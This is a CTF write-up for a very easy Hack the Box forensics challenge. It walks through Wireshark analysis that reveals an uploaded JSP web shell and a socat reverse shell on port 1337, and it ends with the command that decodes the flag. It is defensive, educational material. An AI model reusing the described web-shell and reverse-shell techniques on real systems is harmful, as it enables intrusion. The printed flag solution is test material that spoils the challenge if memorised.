HTB • Wrong Spooky Season
Wrong Spooky Season is a forensics challenge released by c4n0pus on Hack the Box that is marked as very easy and involves analyzing a packet capture to pinpoint malicious traffic.
“I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.” Now there is an internal breach in the `Spooky Network` and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did.
Packet Capture Analysis
We’ll be using Wireshark to analyze the packets in the packet capture file.
HTTP Traffic
The first thing we notice when opening the capture is that there is some plaintext HTTP traffic.
The first impression of the captured traffic
We’ll use the filter http to display only HTTP packets. Looking at the HTTP traffic, it seems that client 192.168.1.180 has uploaded a JSP web shell, and is running commands through GET requests.
Malicious HTTP Command & Control
The attacker can be seen installing the socat utility, then running it like so:
This command is meant to establish a TCP reverse shell on port 1337.
Reverse Shell
We’ll use the filter tcp.port==1337 then follow the TCP stream of the packets to view the reverse shell session.
The last command sent by the attacker contains a statement that does pretty much nothing.
The suspicious string can be reversed and base64-decoded to get the flag.
1
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d